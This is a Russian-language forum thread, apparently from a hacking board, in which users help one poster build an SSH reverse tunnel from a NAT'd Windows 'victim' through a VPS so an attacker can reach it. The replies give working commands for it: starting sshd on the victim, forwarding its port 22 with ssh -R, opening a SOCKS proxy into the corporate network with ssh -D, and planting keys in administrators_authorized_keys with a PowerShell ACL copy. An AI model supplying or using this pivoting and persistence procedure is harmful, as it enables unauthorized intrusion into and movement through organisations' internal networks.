Pivoting Туплю с настройкой ssh tunnel target-vps-attacker

[kamzzzzz]

Объясните где туплю, с портами каша в голове
Имеем
1. Таргет за натом
2. ВПС
3. Атакер

Идем на ВПС, кладем в authorized_keys паб ключи от таргета и атакера (наверное не обязательно, если -o StrictHostKeyChecking=no), для авторизации по ключу (проверяем атакер-впс, таргет-впс все работает)
Идем на таргет под name:
1. Делаем config:

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile path/authorized_keys
Port PORT1
ListenAddress 127.0.0.1
HostKey path/id_rsa
Subsystem sftp Path\sftp-server.exe
PasswordAuthentication no
AllowTCPForwarding yes
PermitOpen any

2. Запускаем сервер sshd.exe -f config
3. Запускаем ssh.exe -i id_rsa -N -R PORT1:127.0.0.1:PORT2 -o StrictHostKeyChecking=no root@VPS"
- Видим на VPS отстук по ssh (порт рандомный), в этом моменте я туплю. PORT1 получается как реверс порт для обращения к ссх таргета?!
4. Идем на атакера в proxychains добавляем socks5 127.0.0.1 PORT3 и запускаем башем:
ssh -N -i id_rsa -L 127.0.0.1:PORT2:127.0.0.1:PORT1 -o StrictHostKeyChecking=no root@VPS (Подключаемся к впс)
ssh.exe -N -i id_rsa -p PORT1 -D 127.0.0.1:PORT3 -o StrictHostKeyChecking=no name@127.0.0.1 "c:\windows\system32\cmd.exe" (подключаемся с впс на таргета и создаем локальный прокси для атакера)

На выходе:
channel 1: open failed: connect failed: Connection refused
kex_exchange_identification: read: Connection reset by peer
Connection reset by 127.0.0.1 port PORT2

 

[ice80]

пробни на таргете через рдп без ключей тунель кинуть если по пассворду дало кури дальше в чем трабла
меняй порты на которые идет конект - юзай 80,8080,443 и прочую классику.
(ссш наружу в сетке файером врятли зарезан в твоей - такие сети отдельная кухня.)

вся суть того что ты делаешь. выставить 22 порт(или любой из тех что sshd.exe слушает)
с таргета за натом себе на сервак у которого паблик айпи

шаг 2 - с сервака запустить ssh -D для ссш тунеля.

судя по тому что ты пишешь у тебя винда и в сети в на сервкае твоем.
ssh под винду не тоже самое что под никсами. возми линукс как впс-аттакера(в твоей терминологии)

и далее чтоб сделать обмен ключами - найди или собери бинарь ssh-copy-id под винду.
дальше : ssh-copy-id no_root@VPS - это в сети корпа запускай, где VPS - нормальную ОС тоесть-линукс
любой дистр из тех что твоя религия позволяет, все что угодно только не петушенную мастдайку
с вендой будешь и дальше ловить факапы 100% - причем причины установить удасться не всегда

если не можешь с ssh-copy-id - генерь руками ключи на таргете в корпе и помести их к себе на сервак откуда impacket-ы всякие пускать собрался, тобишь атакерз-впс

некст ход - ssh -L 127.0.0.1:PORT2:127.0.0.1:PORT1 no_root@VPS ---> тут у тебя уже креды не спросят - тк ключ ты уже закинул. (проверь того ли пользака ключь добавлял и прочие мелочи)
( ауф по ключю на впс проверь - он должен быть разрешен в конфиге ссшд)

После того как ты исполнил выше-сказаное - у тебя 22 порт хоста с локалки корпа будет доступен на впс - дальше разберешься

Дерзай!

 

[IIIIXX]

Идем на ВПС, кладем в authorized_keys паб ключи от таргета и атакера (наверное не обязательно, если -o StrictHostKeyChecking=no), для авторизации по ключу (проверяем атакер-впс, таргет-впс все работает)
может я тебя не так понял, но это разные вещи, паб кей используется для авторизации по приватному ключу, а вот аргумент -o StrictHostKeyChecking=no, используется при подключении к серверу и автоматическом принятии его фингерпринта без yes\y

если твой victim - виндовс, при дефолтной установке openssh через msi пакет, ничего больше тебе настраивать для проброса и для кей-аутентификации не нужно, свой ключ(паблик) можно добавить в файл админов
C:\programdata\ssh\administrators_authorized_keys
или к юзеру в
C:\users\name\.ssh\authorized_keys
для админ файла надо дать разрешения по аналогии с линуксом, делается это просто через пвш

get-acl C:\ProgramData\ssh\ssh_host_rsa_key | set-acl C:\ProgramData\ssh\administrators_authorized_keys

...

3. Запускаем ssh.exe -i id_rsa -N -R PORT1:127.0.0.1:PORT2 -o StrictHostKeyChecking=no root@VPS"
- Видим на VPS отстук по ssh (порт рандомный), в этом моменте я туплю. PORT1 получается как реверс порт для обращения к ссх таргета?!

Да, порт для обращения к ссх таргета(victim), правда я не знаю зачем тебе тут рандомный PORT2, если ты поставил на жертву ссш сервак то форвардить ты будешь именно его, а на нем уже при необходимости поднимать сокс
PORT1 - это тот порт что откроется на твоей впс, а PORT2 это порт сервиса запущенного на твоей victim, в данном случае опенссш под винду, после команды
ssh.exe -i C:\полныйпуть\id_rsa -N -R 1222:127.0.0.1:22 -o StrictHostKeyChecking=no root@VPS
на твоей впс, откроется сокет 127.0.0.1:1222 - теперь это тоже самое что и victim:22

теперь ты можешь или подключиться по ссш напрямую к виндовому шелу командой
ssh -i /root/.ssh/id_rsa administrator@127.0.0.1 -p1222
или поднять сокс и ходить по сетке, 127.0.0.1:8080 - твой сокс
ssh -N -T -D 8080 administrator@127.0.0.1 -p1222 -i /root/.ssh/id_rsa
в случае с 3 машиной в цепи(виндой) ты прокидывашь порт себе на винду(если что проводник и псекзек по соксу не работает, рдп и .net софт можно)
важный нюанс, если ты добавил на жертву паблик ключ из пары которую генерил на линуксе, то и подключаться надо с приватном ключем из этой пары, если ты подключаешься с винды с ключем, тогда тебе нужна пара оттуда, или приватный ключ с линукса(не уверен что будет работать)

channel 1: open failed: connect failed: Connection refused
kex_exchange_identification: read: Connection reset by peer

Ошибку такую ты можешь получать по множеству причин. обычно такое происходит при неверно выбраном логине, или же когда ссшд не правильно стартанул\не стартанул, для начала при подключении к виктиму добавь ключ -v и посмотри вывод, гадать можно бесконечно